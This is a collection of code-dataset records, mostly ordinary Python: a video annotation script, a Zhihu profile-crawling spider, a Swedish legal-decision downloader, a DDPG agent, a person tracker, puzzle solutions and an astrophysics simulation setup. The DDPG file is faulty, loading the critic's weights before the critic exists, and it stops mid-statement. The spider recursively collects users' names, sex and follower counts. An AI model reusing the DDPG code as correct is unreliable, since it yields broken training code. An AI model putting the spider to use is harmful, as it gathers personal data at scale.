os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = json_key\n path_mp4 = f'{bucket}/{id_video}.mp4'\n client = videointelligence.VideoIntelligenceServiceClient()\n features = ['LABEL_DETECTION']\n job = client.annotate_video(input_uri=path_mp4, features=features)\n print(MessageToDict(job.result()))\n return job.result()\n\n\ndef __annotations_to_dicts(id_video: str,\n annotations) -> dict:\n res = annotations.annotation_results[0]\n segment = res.segment_label_annotations\n c_segment = Counter([x.entity.description for x in segment])\n shot = res.shot_label_annotations\n c_shot = Counter([x.entity.description for x in shot])\n c_all = c_segment + c_shot\n c_clean = {k.replace('\\'', '').replace('\\\"', ''): v\n for k, v in c_all.items()}\n return [{'id_video': id_video,\n 'annotation': annotaion,\n 'cnt': cnt}\n for annotaion, cnt in c_clean.items()]\n\n\n\njson_key = 'd:\\\\tiktok\\\\repo\\\\viewer.json'\nstr_bucket = 'noteret_mp4'\nid_video = '7075396968930954497'\na = get_annotations(json_key=json_key, str_bucket=str_bucket, id_video=id_video)\nprint(a)\n","repo_name":"valdas1966/mypy","sub_path":"f_google/u_video_analytics.py","file_name":"u_video_analytics.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9215406672","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Selector\nimport re,json\nfrom zhihu_spider.items import ZhihuSpiderItem\n\n\nclass ZhihuSpider(scrapy.Spider):\n name = 'zhihu'\n allowed_domains = ['www.zhihu.com']\n start_urls = 
['https://www.zhihu.com/people/zhang-jia-wei/following']\n\n def start_requests(self):\n for url in self.start_urls:\n yield scrapy.Request(url.format(\"zhang-jia-wei\"), callback=self.parse)\n def parse(self, response):\n\n print(\"正在获取 {} 信息\".format(response.url))\n all_data = response.body_as_unicode()\n\n select = Selector(response)\n\n # 所有知乎用户都具备的信息\n username = select.xpath(\"//span[@class='ProfileHeader-name']/text()\").extract_first() \t\t# 获取用户昵称\n sex = select.xpath(\"//div[@class='ProfileHeader-iconWrapper']/svg/@class\").extract()\n if len(sex) > 0:\n sex = 1 if str(sex[0]).find(\"male\") else 0\n else:\n sex = -1\n answers = select.xpath(\"//li[@aria-controls='Profile-answers']/a/span/text()\").extract_first()\n asks = select.xpath(\"//li[@aria-controls='Profile-asks']/a/span/text()\").extract_first()\n posts = select.xpath(\"//li[@aria-controls='Profile-posts']/a/span/text()\").extract_first()\n columns = select.xpath(\"//li[@aria-controls='Profile-columns']/a/span/text()\").extract_first()\n pins = select.xpath(\"//li[@aria-controls='Profile-pins']/a/span/text()\").extract_first()\n # 用户有可能设置了隐私,必须登录之后看到,或者记录cookie!\n follwers = select.xpath(\"//strong[@class='NumberBoard-itemValue']/@title\").extract()\n\n item = ZhihuSpiderItem()\n item[\"username\"] = username\n item[\"sex\"] = sex\n item[\"answers\"] = answers\n item[\"asks\"] = asks\n item[\"posts\"] = posts\n item[\"columns\"] = columns\n item[\"pins\"] = pins\n item[\"follwering\"] = follwers[0] if len(follwers) > 0 else 0\n item[\"follwers\"] = follwers[1] if len(follwers) > 0 else 0\n yield item\n\n # 获取第一页关注者列表\n pattern = re.compile('<script id=\\\"js-initialData\\\" type=\\\"text/json\\\">(.*?)<\\/script>')\n json_data = pattern.search(all_data).group(1)\n if json_data:\n users = json.loads(json_data)[\"initialState\"][\"entities\"][\"users\"]\n for user in users:\n yield scrapy.Request(self.start_urls[0].format(user),callback=self.parse, dont_filter=False)\n\n","repo_name":"1286211699/mmc_code","sub_path":"zhihu_spider/zhihu_spider/spiders/zhihu.py","file_name":"zhihu.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4562239424","text":"#!/usr/bin/env python\n# -*- coding: iso-8859-1 -*-\n\"\"\"Hanterar referat från Allmäna Reklamationsnämnden, www.arn.se.\n\nModulen hanterar hämtande av referat från ARNs webbplats, omvandlande\nav dessa till XHTML2/RDFa, samt transformering till browserfärdig\nXHTML1.\n\"\"\"\nimport unittest\nimport sys\nimport time\nimport re\nimport os\nimport urllib\nimport xml.etree.cElementTree as ET # Python 2.5 spoken here\nimport logging\nfrom datetime import datetime\nfrom time import time\nfrom tempfile import mktemp\nfrom pprint import pprint\nfrom collections import defaultdict\n\n# 3rd party\nimport BeautifulSoup\nfrom mechanize import Browser, LinkNotFoundError, urlopen\nfrom rdflib import Namespace\n\n# My own stuff\nimport LegalSource\nimport Util\nfrom LegalRef import LegalRef,ParseError,Link,LinkSubject\nfrom DispatchMixin import DispatchMixin\nfrom DataObjects import UnicodeStructure, CompoundStructure, \\\n MapStructure, IntStructure, DateStructure, PredicateType, \\\n serialize\n\n__version__ = (0,1)\n__author__ = u\"Staffan Malmgren <staffan@tomtebo.org>\"\n__shortdesc__ = u\"Referat från ARN\"\n__moduledir__ = \"arn\"\nlog = logging.getLogger(__moduledir__)\nif not os.path.sep in __file__:\n __scriptdir__ = os.getcwd()\nelse:\n __scriptdir__ = 
os.path.dirname(__file__)\n\n\nclass UnicodeSubject(PredicateType,UnicodeStructure): pass\nclass Stycke(CompoundStructure): pass\n\nclass ARNDownloader(LegalSource.Downloader):\n \n def __init__(self,config):\n super(ARNDownloader,self).__init__(config)\n\n def _get_module_dir(self):\n return __moduledir__\n \n def DownloadAll(self):\n return\n # self.__download(\"http://www.arn.se/netacgi/brs.pl?d=REFE&l=20&p=1&u=%2Freferat.htm&r=0&f=S&Sect8=PLSCRIPT&s1=%40DOCN&s2=&s3=&s4=&s5=&s6=\")\n \n def DownloadNew(self):\n return\n # self.__download(\"http://www.arn.se/netacgi/brs.pl?d=REFE&l=20&p=1&u=%2Freferat.htm&r=0&f=S&Sect8=PLSCRIPT&s1=&s2=&s3=&s4=&s5=\" + str(datetime.now().year) +\"*&s6=\")\n\n def __download(self,url):\n log.debug(\"Opening %s\" % url)\n self.browser.open(url)\n done = False\n pagecnt = 1\n while not done:\n log.info(\"Result page #%s\" % pagecnt)\n for l in (self.browser.links(text_regex=r'\\d+-\\d+')):\n basefile = l.text.replace(\"-\", \"/\")\n filename = \"%s/%s.html\" % (self.download_dir, basefile)\n if not os.path.exists(filename):\n log.info(\" Fetching %s\" % basefile)\n Util.ensureDir(filename)\n self.browser.retrieve(l.absolute_url,filename)\n self.download_log.info(basefile)\n self.browser.retrieve(l.absolute_url,filename)\n try:\n self.browser.follow_link(predicate=lambda x: x.text == '[NEXT_LIST][IMG]')\n pagecnt += 1\n except LinkNotFoundError:\n log.info(u'No next page link found, we must be done')\n done = True\n\nclass ARNParser(LegalSource.Parser):\n\n def Parse(self,basefile,files):\n parser = LegalRef(LegalRef.LAGRUM, LegalRef.EGLAGSTIFTNING, LegalRef.FORARBETEN)\n DCT = Namespace(Util.ns['dct'])\n RINFO = Namespace(Util.ns['rinfo'])\n RINFOEX = Namespace(Util.ns['rinfoex'])\n self.id = basefile\n import codecs\n # log.debug(\"Loading %s\" % files['main'][0])\n soup = Util.loadSoup(files['main'][0])\n\n # FIXME: Create a better URI pattern\n meta = {'xml:base': \"http://rinfo.lagrummet.se/publ/arn/%s\" % basefile.replace(\"/\",\"-\")}\n\n meta[u'Ärendenummer'] = UnicodeSubject(soup.first('h2').b.i.string.strip(),\n predicate=RINFOEX['arendenummer'])\n meta['dct:identifier'] = \"ARN %s\" % meta[u'Ärendenummer']\n\n rubrik = soup.first('h3').string.strip()\n if not rubrik:\n rubrik = u\"(Rubrik saknas)\"\n meta[u'Rubrik'] = UnicodeSubject(rubrik,\n predicate=DCT['description'])\n \n meta[u'Ärendemening'] = UnicodeSubject(soup.firstText(u\"Ärendemening: \").parent.parent.parent.parent.contents[1].string.strip(),\n predicate=DCT['subject'])\n meta[u'Avdelning'] = UnicodeSubject(Util.elementText(soup.firstText('Avdelning: ').parent.parent.parent.parent.contents[1]).strip(),\n predicate=RINFOEX['avdelning'])\n meta[u'Beslutsdatum'] = UnicodeSubject(Util.elementText(soup.firstText('Beslutsdatum: ').parent.parent.parent.parent.contents[1]).strip(),\n predicate=RINFO['beslutsdatum'])\n \n meta[u'Beslut'] = UnicodeSubject(soup.firstText('Beslut: ').parent.parent.parent.parent.contents[1].string.strip(),\n predicate=RINFOEX['beslutsutfall'])\n \n node = soup.firstText('Referat:').parent.parent.parent.nextSibling.nextSibling\n\n body = []\n while node and node.name == 'p':\n nodetext = Util.elementText(node).replace('\\x1a','')\n body.append(Stycke(parser.parse(nodetext, predicate=\"rinfo:lagrum\")))\n node = node.nextSibling\n\n xhtml = self.generate_xhtml(meta, body, None, __moduledir__, globals())\n return xhtml\n\nclass ARNManager(LegalSource.Manager):\n __parserClass = ARNParser\n def DownloadAll(self):\n ad = ARNDownloader(self.config)\n ad.DownloadAll()\n 
pass\n \n def DownloadNew(self):\n ad = ARNDownloader(self.config)\n ad.DownloadNew()\n pass\n\n def Parse(self,basefile):\n # almost generic code - could be moved to LegalSource\n start = time()\n infile = os.path.sep.join([self.baseDir, __moduledir__, 'downloaded', basefile]) + \".html\"\n outfile = os.path.sep.join([self.baseDir, __moduledir__, 'parsed', basefile]) + \".xht2\"\n \n force = (self.config[__moduledir__]['parse_force'] == 'True')\n if not force and self._outfile_is_newer([infile],outfile):\n log.debug(u\"%s: Skipping\", basefile)\n return\n\n p = self.__parserClass()\n parsed = p.Parse(basefile,{'main':[infile]})\n Util.ensureDir(outfile)\n tmpfile = mktemp()\n out = file(tmpfile, \"w\")\n out.write(parsed)\n out.close()\n #Util.indentXmlFile(tmpfile)\n Util.replace_if_different(tmpfile,outfile)\n log.info(u'%s: OK (%.3f sec)', basefile,time()-start)\n \n def _file_to_basefile(self,f):\n \"\"\"Given a full physical filename, transform it into the\n logical id-like base of that filename, or None if the filename\n shouldn't be processed.\"\"\"\n \n return \"/\".join(os.path.split(os.path.splitext(os.sep.join(os.path.normpath(f).split(os.sep)[-2:]))[0]))\n\n\n def Generate(self,basefile):\n # Generic code (except \"xsl/arn.xsl\" - could be moved to LegalSource)\n infile = self._xmlFileName(basefile)\n outfile = self._htmlFileName(basefile)\n\n force = (self.config[__moduledir__]['generate_force'] == 'True')\n if not force and self._outfile_is_newer([infile], outfile):\n log.debug(u\"%s: Överhoppad\", basefile)\n return\n Util.mkdir(os.path.dirname(outfile))\n log.info(u'Transformerar %s > %s' % (infile,outfile))\n Util.transform(\"xsl/arn.xsl\",\n infile,\n outfile,\n {},\n validate=False)\n\n def _get_module_dir(self):\n return __moduledir__\n\n def _indexpages_predicates(self):\n return [Util.ns['rinfo']+'beslutsdatum',\n Util.ns['dct']+'identifier',\n Util.ns['dct']+'description']\n \n def _build_indexpages(self, by_pred_obj, by_subj_pred):\n return # we never use these\n documents = defaultdict(lambda:defaultdict(list))\n pagetitles = {}\n pagelabels = {}\n\n date_pred = Util.ns['rinfo']+'beslutsdatum'\n id_pred = Util.ns['dct']+'identifier'\n desc_pred = Util.ns['dct']+'description'\n category = u'Efter år' # just one categeory for now\n\n # ['beslutsdatum']['2008-302-32'] = [sub1 sub2]\n\n for obj in by_pred_obj[date_pred]:\n label = category\n year = obj.split(\"-\")[0]\n for subj in by_pred_obj[date_pred][obj]:\n identifier = by_subj_pred[subj][id_pred]\n\n desc = by_subj_pred[subj][desc_pred]\n if len(desc) > 80:\n desc = desc[:80].rsplit(' ',1)[0]+'...'\n pageid = '%s' % year\n pagetitles[pageid] = u'Beslut från Allmänna Reklamationsnämnden under %s' % year\n pagelabels[pageid] = year\n documents[label][pageid].append({'uri':subj,\n 'sortkey':identifier,\n 'title':identifier,\n 'trailer':' '+desc[:80]})\n\n outfile = \"%s/%s/generated/index/index.html\" % (self.baseDir, self.moduleDir)\n if '%d' % (datetime.today().year) in pagetitles:\n pageid = '%d' % (datetime.today().year)\n else:\n # handles the situation in january, before any verdicts\n # for the new year is available\n pageid = '%d' % (datetime.today().year-1) \n title = pagetitles[pageid]\n self._render_indexpage(outfile,title,documents,pagelabels,category,pageid,docsorter=Util.numcmp)\n\n\n for category in documents.keys():\n for pageid in documents[category].keys():\n outfile = \"%s/%s/generated/index/%s.html\" % (self.baseDir, self.moduleDir, pageid)\n title = pagetitles[pageid]\n 
self._render_indexpage(outfile,title,documents,pagelabels,category,pageid,docsorter=Util.numcmp)\n\n\nif __name__ == \"__main__\":\n import logging.config\n logging.config.fileConfig(__scriptdir__ + '/etc/log.conf')\n ARNManager.__bases__ += (DispatchMixin,)\n mgr = ARNManager()\n mgr.Dispatch(sys.argv)\n \n \n \n","repo_name":"staffanm/legacy.lagen.nu","sub_path":"ARN.py","file_name":"ARN.py","file_ext":"py","file_size_in_byte":10286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19071101435","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom models import Actor, Critic\nfrom buffer import ReplayBuffer\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass DDPG:\n def __init__(self, sdim, adim, amax):\n # actor network and actor-target network\n self.actor = Actor(sdim, adim, amax).to(device)\n self.actor_target = Actor(sdim, adim, amax).to(device)\n self.actor_target.load_state_dict(self.critic.state_dict())\n self.actor_opt = torch.optim.Adam(self.actor.parameters(), lr=1e-4)\n\n # critic network and critic-target network\n self.critic = Critic(sdim, adim).to(device)\n self.critic_target = Critic(sdim, adim).to(device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n self.critic_opt = torch.optim.Adam(self.critic.parameters(), lr=1e-4)\n \n def tensorify(self, state, action, reward, sprime, done, weights):\n # helper method to convert all objects received from buffer to tensors\n return torch.FloatTensor(state).to(device), torch.FloatTensor(action).to(device), \\\n torch.FloatTensor(reward).to(device), torch.FloatTensor(sprime).to(device), \\\n torch.FloatTensor(1 - done).to(device), torch.FloatTensor(weights).to(device)\n \n def save_checkpoint(self):\n print(\"...saving checkpoint\")\n torch.save(self.state_dict(), self.checkpoint)\n\n \n def load_checkpoint(self):\n print(\"...loading checkpoint\")\n self.load_state_dict(torch.load(self.checkpoint))\n\n\n def get_action(self, state): \n # pass the state through the network\n # this calls the __call__ method which via pytorch's\n # nn.Module is changed to call a bunch of hooks\n return self.actor(torch.FloatTensor(state.reshape(1, -1)).to(device)).cpu().data.numpy().flatten()\n \n\n def train(self, buffer, prioritized, beta, epsilon, T, batch_size=64, gamma=0.99, tau=0.005):\n for i in range(T):\n # get state, action, reward, next state from buffer to update networks\n s, a, r, sprime, done = buffer.sample(batch_size)\n weights, batch_indices = np.ones_like(r), None\n s, a, r, sprime, done, weights = self.tensorify(s, a, r, sprime, done, weights)\n \n # compute q, y, and td errors\n q_target = self.critic_target(sprime, self.actor_target(sprime)) \n y = r + (done * gamma * q_target).detach()\n q = self.critic(s, a)\n td_error = y - q\n w_td_error = torch.mul(td_error, np.sqrt(weights))\n zero_tensor = torch.zeros(w_td_error.shape)\n critic_loss = F.mse_loss(w_td_error, zero_tensor)\n\n # update critic\n self.critic_opt.zero_grad()\n critic_loss.backward()\n self.critic_opt.step()\n\n # compute actor loss\n actor_loss = -self.critic(s, self.actor(s)).mean()\n self.actor_opt.zero_grad()\n actor_loss.backward()\n self.actor_opt.step()\n\n # update target models\n fo\n 
\n\n\n","repo_name":"matthewstachyra/ddpg-ned2-robot","sub_path":"ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70553392253","text":"import cv2\nimport datetime\nimport imutils\nimport numpy as np\nimport os\nfrom .centroidtracker import CentroidTracker\nfrom .writer import ImageWriter\nfrom .data import Data\n\n\nclass PersonTracker:\n def __init__(self):\n self.name = 'person'\n self.proto_path = os.path.join(os.getcwd(), \"util/mobilenet/MobileNetSSD_deploy.prototxt\")\n self.model_path = os.path.join(os.getcwd(), \"util/mobilenet/MobileNetSSD_deploy.caffemodel\")\n self.write_path = os.path.join(os.getcwd(), \"imgs\", self.name)\n\n self.detector = cv2.dnn.readNetFromCaffe(prototxt=self.proto_path, caffeModel=self.model_path)\n self.data = Data().instance()\n # Only enable it if you are using OpenVino environment\n # detector.setPreferableBackend(cv2.dnn.DNN_BACKEND_INFERENCE_ENGINE)\n # detector.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n self.CLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\n\n self.tracker = CentroidTracker(maxDisappeared=80, maxDistance=90)\n self.objectId = 0\n self.frame_cnt = 0\n self.person_crops = []\n\n def non_max_suppression_fast(self, boxes, overlapThresh):\n try:\n if len(boxes) == 0:\n return []\n\n if boxes.dtype.kind == \"i\":\n boxes = boxes.astype(\"float\")\n\n pick = []\n\n x1 = boxes[:, 0]\n y1 = boxes[:, 1]\n x2 = boxes[:, 2]\n y2 = boxes[:, 3]\n\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n idxs = np.argsort(y2)\n\n while len(idxs) > 0:\n last = len(idxs) - 1\n i = idxs[last]\n pick.append(i)\n\n xx1 = np.maximum(x1[i], x1[idxs[:last]])\n yy1 = np.maximum(y1[i], y1[idxs[:last]])\n xx2 = np.minimum(x2[i], x2[idxs[:last]])\n yy2 = np.minimum(y2[i], y2[idxs[:last]])\n\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n overlap = (w * h) / area[idxs[:last]]\n\n idxs = np.delete(idxs, np.concatenate(([last],\n np.where(overlap > overlapThresh)[0])))\n\n return boxes[pick].astype(\"int\")\n except Exception as e:\n print(\"Exception occurred in non_max_suppression : {}\".format(e))\n\n def run(self, frame):\n frame = imutils.resize(frame, width=600)\n\n (H, W) = frame.shape[:2] # 450 600\n # print(frame.shape) # (450, 600, 3)\n\n # blob 이미지 생성\n # 파라미터\n # 1) image : 사용할 이미지\n # 2) scalefactor : 이미지 크기 비율 지정\n # 3) size : Convolutional Neural Network에서 사용할 이미지 크기를 지정\n # 4) mean : Mean Subtraction 값을 RGB 색상 채널별로 지정해 주는 경험치 값(최적의 값)\n blob = cv2.dnn.blobFromImage(frame, 0.007843, (W, H), 127.5)\n # print(blob)\n # [[[[-0.1137235 -0.1372525 -0.1137235 ... 
0.5764605 0.5843035\n # 0.5843035 ] ....\n\n # 사람 인식\n self.detector.setInput(blob)\n person_detections = self.detector.forward() # caffe 모델이 처리한 결과값 : 4차원 배열\n # print(person_detections.shape) # (1, 1, 100, 7)\n\n rects = []\n # 사람인식 수 만큼 반복\n for i in np.arange(0, person_detections.shape[2]):\n # 사람 확률 추출\n confidence = person_detections[0, 0, i, 2]\n\n # 사람 확률이 0.4보다 큰 경우\n if confidence > 0.4:\n # 인식된 사람 index\n idx = int(person_detections[0, 0, i, 1])\n\n # print(int(person_detections[0, 0, i, 1])) # 15\n\n if self.CLASSES[idx] != \"person\":\n continue\n\n # bounding box 위치 계산\n person_box = person_detections[0, 0, i, 3:7] * np.array([W, H, W, H])\n (startX, startY, endX, endY) = person_box.astype(\"int\")\n # print(person_box)\n rects.append(person_box)\n\n boundingboxes = np.array(rects)\n boundingboxes = boundingboxes.astype(int)\n rects = self.non_max_suppression_fast(boundingboxes, 0.3)\n\n objects = self.tracker.update(rects)\n\n self.data.lock.acquire()\n certification_Id = self.data.certification_Id\n self.data.lock.release()\n\n # ---- with certification\n # if certification_Id < 0:\n # # 인증되기 전에는 검출된 모든 사람의 박스 출력\n # for (objectId, bbox) in objects.items():\n # x1, y1, x2, y2 = bbox\n # x1 = int(x1)\n # y1 = int(y1)\n # x2 = int(x2)\n # y2 = int(y2)\n #\n # text = \"ID: {}\".format(objectId)\n # cv2.putText(frame, text, (x1, y1 - 5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n # cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 2)\n # else:\n # # 인증 되고 나서는 해당 사람만 박싱해서 보여준다.\n # x1, y1, x2, y2 = objects[certification_Id]\n # text = f\"ID: {certification_Id}\"\n # cv2.putText(frame, text, (x1, y1 - 5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n # cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\n # -- no certification\n for (objectId, bbox) in objects.items():\n x1, y1, x2, y2 = bbox\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n\n text = \"ID: {}\".format(objectId)\n cv2.putText(frame, text, (x1, y1-5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n\n # 만약 사용자가 손을 든다면 (openpose)\n # 그 사용자의 objectID를 기억해서 그 사용자만 추적하기(?)\n if objectId == 2:\n # bounding box 출력\n cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 2)\n # text = \"ID: {}\".format(objectId)\n cv2.putText(frame, text, (x1, y1-5), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 1)\n\n # frame write\n cv2.imwrite(os.path.join(self.write_path, f\"frame{self.frame_cnt}.jpg\"), frame)\n self.frame_cnt += 1\n # cv2.waitKey(1)\n\n if len(objects) > 0:\n if certification_Id >= 0: # Pass certification\n return [objects[certification_Id]]\n else:\n return [objects]\n else:\n return None\n","repo_name":"hyemWon/self_driving_drone","sub_path":"src/server/util/person_tracking.py","file_name":"person_tracking.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"325569989","text":"from argparse import ArgumentParser\nfrom build_assets.PathResolverAction import PathResolverAction\n\n\ndef get_selenium_runner_args(peek_mode=False):\n parser = ArgumentParser(description=\"Upload svgs to Icomoon to create icon files.\")\n\n parser.add_argument(\"--headless\",\n help=\"Whether to run the browser in headless/no UI mode\",\n action=\"store_true\")\n\n parser.add_argument(\"geckodriver_path\",\n help=\"The path to the firefox executable file\",\n action=PathResolverAction)\n\n parser.add_argument(\"icomoon_json_path\",\n help=\"The path to the icomoon.json aka the selection.json 
created by Icomoon\",\n action=PathResolverAction)\n\n parser.add_argument(\"devicon_json_path\",\n help=\"The path to the devicon.json\",\n action=PathResolverAction)\n\n parser.add_argument(\"icons_folder_path\",\n help=\"The path to the icons folder\",\n action=PathResolverAction)\n\n parser.add_argument(\"download_path\",\n help=\"The download destination of the Icomoon files\",\n action=PathResolverAction)\n\n if peek_mode:\n parser.add_argument(\"--pr_title\",\n help=\"The title of the PR that we are peeking at\")\n\n return parser.parse_args()","repo_name":"rvorine/appicons","sub_path":".github/scripts/build_assets/arg_getters.py","file_name":"arg_getters.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25198579674","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def verticalTraversal(self, root: Optional[TreeNode]) -> List[List[int]]:\n pos = {}\n \n def sub(node, x, y):\n if node is None:\n return\n \n if y not in pos:\n pos[y] = {}\n \n if x not in pos[y]:\n pos[y][x] = []\n \n pos[y][x].append(node.val)\n \n sub(node.left, x+1, y-1)\n sub(node.right, x+1, y+1)\n \n \n sub(root, 0, 0)\n \n ans = []\n for y in sorted(pos.keys()):\n ans_sub = []\n for x in sorted(pos[y].keys()):\n ans_sub += sorted(pos[y][x])\n \n ans.append(ans_sub)\n \n return ans","repo_name":"wijae/LeetCode","sub_path":"987-vertical-order-traversal-of-a-binary-tree/987-vertical-order-traversal-of-a-binary-tree.py","file_name":"987-vertical-order-traversal-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5729492163","text":"from enum import Enum\nfrom typing import List, Optional\n\nfrom rctools.models.base import IdMixin, ReadiChargeBaseModel, TimestampMixin\n\n\nclass Alert(IdMixin, TimestampMixin, ReadiChargeBaseModel):\n class AlertTypes(str, Enum):\n message = 'message' # icon: chat bubble\n notification = 'notification' # icon: bell\n payment_incoming = 'payment_incoming' # icon: dollar sign with arrow entering from left\n payment_outgoing = 'payment_outgoing' # icon: dollar sign with arrow exiting on right\n rating = 'rating' # icon: star\n warning = 'warning' # icon: red exclamation mark in a circle\n \n uid: Optional[str]\n title: str\n type: AlertTypes\n content: Optional[str]\n expired: Optional[int]\n path: Optional[str]\n path_id: Optional[str]\n rating: Optional[float]\n\n\nclass AlertsResponse(ReadiChargeBaseModel):\n alerts: Optional[List[Alert]] = []\n\n","repo_name":"yashkumarsingh995/api_testing","sub_path":"common/rctools/rctools/models/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73881302011","text":"def input_generator(input: str):\n for i in [int(i) for i in input.split(' ')]:\n yield i\n\n\ndef get_meta_data_sum(input: [int]) -> int:\n result = 0\n children = next(input)\n metadata = next(input)\n\n for _ in range(children):\n result += get_meta_data_sum(input)\n\n for _ in range(metadata):\n result += next(input)\n\n return result\n\n\nassert get_meta_data_sum(input_generator('0 1 99')) == 99\nassert get_meta_data_sum(input_generator('0 3 10 11 12')) == 33\nassert 
get_meta_data_sum(input_generator('1 1 0 1 99 2')) == 101\nassert get_meta_data_sum(input_generator('2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2')) == 138\n\n# The input taken from https://adventofcode.com/2018/day/8/input\ninput = '<input>'\nprint('Solution for first part:', get_meta_data_sum(input_generator(input)))\n\n\ndef get_root_node(input: [int]) -> int:\n result = 0\n children = next(input)\n metadata = next(input)\n\n if children == 0:\n for _ in range(metadata):\n result += next(input)\n else:\n children_roots = [get_root_node(input) for _ in range(children)]\n\n for _ in range(metadata):\n meta = next(input) - 1\n\n result += children_roots[meta] if meta < children else 0\n\n return result\n\n\ndef test_root_node(input: str, excepted):\n result = get_root_node(input_generator(input))\n\n assert result == excepted, f\"Except: {excepted} recived: {result}\"\n\n\ntest_root_node('0 1 99', 99)\ntest_root_node('0 3 10 11 12', 33)\ntest_root_node('1 1 0 1 99 2', 0)\ntest_root_node('2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2', 66)\n\n\nprint('Solution for second part:', get_root_node(input_generator(input)))\n","repo_name":"dplocki/advent-of-code","sub_path":"2018/2018_08.py","file_name":"2018_08.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37878717944","text":"\"\"\"\n\n@author: David P. Fleming, University of Washington, Seattle\n@email: dflemin3 (at) uw (dot) edu\nNov. 2018\n\nThis script produces a population of single stars.\n\nAssumptions:\n- Template files live directory where this script exists.\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport os\nfrom datetime import datetime\nimport stat\nimport sys\n\n# Constants/Control Flags\nnum = 10000 # Number of sets of initial conditions to generate\nPATH = os.path.dirname(os.path.realpath(__file__))\nsave_dist = True # Save initial condition distributions?\nshow_plots = True # visualize initial condition distributions?\nwrite_infiles = True # Write the vplanet input files, or just sample from distributions if False\nseed = int(os.getpid()*datetime.now().microsecond/100) # Random seed\n\n# Set RNG seed\nnp.random.seed(seed)\n\n# File names\nsys_name = \"vpl.in\"\nprimary_name = \"primary.in\"\n\n# Lists to hold stuff\npri_rot = []\npri_mass = []\n\nrunfile_names = []\n\n### Helper functions ###\ndef lognuniform(low=0, high=1, size=None, base=10.0):\n return np.power(base, np.random.uniform(low, high, size))\n# end function\n\n\n### Make the simulation initial conditions! 
###\nfor ii in range(num):\n\n # Create a directory for the simulation to live in\n if write_infiles:\n directory = \"simulation_\" + str(ii)\n if not os.path.exists(os.path.join(PATH,directory)):\n os.makedirs(os.path.join(PATH,directory))\n\n ### Populate the primary input file ###\n\n # Read template input file\n with open(os.path.join(PATH, 'primary.in'), 'r') as f:\n primary_in = f.read()\n\n # Sample from priors for initial conditions\n\n # Loguniform initial rotation period prior over [0.8, 15] days (Matt+2015)\n dRotPeriod = -lognuniform(low=np.log10(0.8), high=np.log10(15.0)) # negative -> days\n\n # Mass is uniformly sampled over [0.1, 1.0]\n dMass = np.random.uniform(low=0.1, high=1.0)\n\n # Write initial conditions to file\n primary_in = re.sub('%s(.*?)#' % 'dRotPeriod', '%s %.5e #' % ('dRotPeriod', dRotPeriod), primary_in)\n primary_in = re.sub('%s(.*?)#' % 'dMass', '%s %.5e #' % ('dMass', dMass), primary_in)\n\n if write_infiles:\n with open(os.path.join(PATH, directory, primary_name), 'w') as f:\n print(primary_in, file = f)\n\n # Save em for later...\n pri_rot.append(-dRotPeriod)\n pri_mass.append(dMass)\n\n # Write vpl file\n\n # Read template input file\n with open(os.path.join(PATH, sys_name), 'r') as f:\n sys_in = f.read()\n\n # Age = 7 Gyr\n dAge = 7.0e9\n\n # Tell vpl.in file how many bodies are in simulation\n saBodyFiles = \"primary.in\"\n\n # Write vpl file\n sys_in = re.sub('%s(.*?)#' % 'dStopTime', '%s %.5e #' % ('dStopTime', dAge), sys_in)\n sys_in = re.sub('%s(.*?)#' % 'saBodyFiles', '%s %s #' % ('saBodyFiles', saBodyFiles), sys_in)\n\n if write_infiles:\n with open(os.path.join(PATH, directory, sys_name), 'w') as f:\n print(sys_in, file 